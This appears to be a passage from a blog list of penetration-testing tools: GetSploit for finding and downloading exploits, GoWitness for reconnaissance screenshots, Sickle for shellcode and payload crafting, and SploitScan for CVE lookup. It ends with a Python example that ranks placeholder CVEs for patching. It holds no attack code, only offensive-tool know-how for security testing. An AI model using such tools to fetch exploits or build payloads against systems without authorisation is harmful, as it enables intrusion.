[Screenshot: usage output of Coercer, listing its positional arguments and options; the option text did not survive extraction.]

3. GetSploit

GetSploit moves the concept of the searchsploit tool a step ahead. It merges searching for exploit code from the command line with the capability of immediate download. It is an online exploit database query tool for ExploitDB, Metasploit, and Packetstorm, which gives penetration testers the ability to find relevant exploits without having to leave their terminal. Another of the strongest features of GetSploit is its ability to download exploit source code directly into a user's working directory.
This makes the exploitation process easier. This is convenient in scenarios where, as a penetration tester, one needs faster access to exploit code during an engagement: they can respond to discovered vulnerabilities quickly. What makes GetSploit so powerful is that this broad search across numerous databases increases its chances of returning with a working exploit.

[Screenshot: usage output of getsploit --help. Legible fragments include: -t, --title (Search JUST the exploit title; default is description), -j, --json (Show result in JSON format), and a mirror option (Mirror (aka copies) search result exploit files to the current working directory).]

4. GoWitness

GoWitness is a utility written in Golang, used for taking screenshots of websites and web applications. It is very helpful in the documentation of a target's web interfaces during penetration testing. It uses Headless Chrome to take screenshots and provides a clear view of the target's web interfaces directly from the command line. GoWitness is very handy during the reconnaissance phase of a web application test. In most cases, knowing how web pages are laid out and presented helps in finding potential vulnerabilities. Coupled with that, it also helps in documentation by capturing the screenshot, which is automatically stored for one to view later or put into the report.
This feature is especially vital for penetration testers, since they need to have proper records of their findings and present them in a clear, well-viewed format.

[Screenshot: gowitness command overview. Legible fragments include the subcommands completion (Generate the autocompletion script for the specified shell), file (Screenshot URLs sourced from a file or stdin), nessus, nmap, and a scan mode described as taking a CIDR range and taking screenshots along the way.]

5. Sickle-Tool

Sickle is a payload development tool that caters to the specific needs of penetration testers working with shellcode and other kinds of payloads. Originally developed for shellcode crafting, Sickle has matured to cater to several types of exploits, particularly those involving assembly. It provides testers with a platform for developing custom payloads and for building an exploit around a given payload after completion. It is quite helpful for the penetration tester in cases where general payloads are ineffective, or in specific scenarios in which the attack vector must be highly customized. Not only does Sickle improve the effectiveness of a penetration test by customizing payloads tailored to specific situations, but it also contributes to the development of new, innovative exploit techniques.

"I was addicted to hacking, more for the intellectual challenge, the curiosity, the seduction of adventure; not for stealing, or causing damage or writing computer viruses."
- Kevin Mitnick

[Screenshot: usage output of sickle-tool. Legible fragments include: usage: sickle-tool [-h] [-r READ] [-f FORMAT] [-s] [-m MODULE] [-a ARCH] [-b BADCHARS] ..., an example invocation sickle -s -f -b '\x00', the option -m MODULE, --module MODULE, and a flag to list all available formats and arguments.]

6. SploitScan

SploitScan is a command-line utility that puts at the pen tester's disposal one of the largest sources for looking up CVEs. It aggregates a number of cybersecurity databases, including MITRE, CISA, and EPSS, among others, to provide detailed information on known vulnerabilities and their exploitability, together with patch priorities. This tool is especially useful for a penetration tester running vulnerability assessment and management. It enables the penetration tester to further prioritize vulnerabilities according to their impact and whether exploits are publicly available. The export option in JSON or CSV formats permits easy integration with other tools and makes detailed reporting possible, making SploitScan an essential tool in managing the complexity of modern threats against cybersecurity.

"I got so passionate about technology. Hacking to me was like a video game. It was about getting trophies. I just kept going on and on, despite all the trouble I was getting into, because I was hooked."
- Kevin Mitnick
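To make the patch-priority idea behind SploitScan concrete, here is an added example of the kind of ranking such an aggregator produces. It is not SploitScan's own code or scoring: it combines the three signals the description names (a MITRE/NVD base score, CISA KEV membership, and the FIRST EPSS exploitation probability) with a public-exploit flag into a priority band, then exports the ranked list as JSON or CSV. The records, the band thresholds, and the CVE identifiers (CVE-0000-0000x placeholders) are constructed for this example.

```python
"""Rank CVE findings by exploitability and export them, SploitScan-style (constructed example)."""
import csv
import io
import json
from dataclasses import asdict, dataclass


@dataclass
class CveRecord:
    cve_id: str
    cvss: float            # NVD/MITRE base score, 0.0 to 10.0
    epss: float            # FIRST EPSS: probability of exploitation in the next 30 days
    in_kev: bool           # present in CISA's Known Exploited Vulnerabilities catalogue
    public_exploit: bool   # a public exploit or PoC is known (e.g. from an exploit database)


def priority(rec: CveRecord) -> str:
    """Assumed banding: confirmed exploitation beats predicted exploitation beats raw severity."""
    if rec.in_kev:
        return "P1"        # known to be exploited in the wild: patch now
    if rec.epss >= 0.5 or (rec.public_exploit and rec.cvss >= 7.0):
        return "P2"        # likely to be exploited, or trivially so given a public PoC
    if rec.cvss >= 7.0:
        return "P3"        # severe on paper, little exploitation evidence
    return "P4"


def rank(records):
    """Highest priority first; ties broken by EPSS, then CVSS."""
    return sorted(records, key=lambda r: (priority(r), -r.epss, -r.cvss))


def to_json(records) -> str:
    return json.dumps([{**asdict(r), "priority": priority(r)} for r in rank(records)], indent=2)


def to_csv(records) -> str:
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=list(CveRecord.__dataclass_fields__) + ["priority"])
    writer.writeheader()
    for r in rank(records):
        writer.writerow({**asdict(r), "priority": priority(r)})
    return buf.getvalue()


# Constructed sample findings, as a scanner might report them for one host.
SAMPLE_FINDINGS = [
    CveRecord("CVE-0000-00001", cvss=9.8, epss=0.03, in_kev=False, public_exploit=False),
    CveRecord("CVE-0000-00002", cvss=7.5, epss=0.91, in_kev=False, public_exploit=True),
    CveRecord("CVE-0000-00003", cvss=6.5, epss=0.10, in_kev=True, public_exploit=True),
    CveRecord("CVE-0000-00004", cvss=4.3, epss=0.01, in_kev=False, public_exploit=False),
]


if __name__ == "__main__":
    print(to_csv(SAMPLE_FINDINGS))
```

The point the sample makes is that the 9.8-scored finding is not the first thing to patch: the medium-scored one already on the KEV list and the one with a high EPSS and a public PoC both outrank it, which is exactly the reordering the description attributes to combining these sources.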
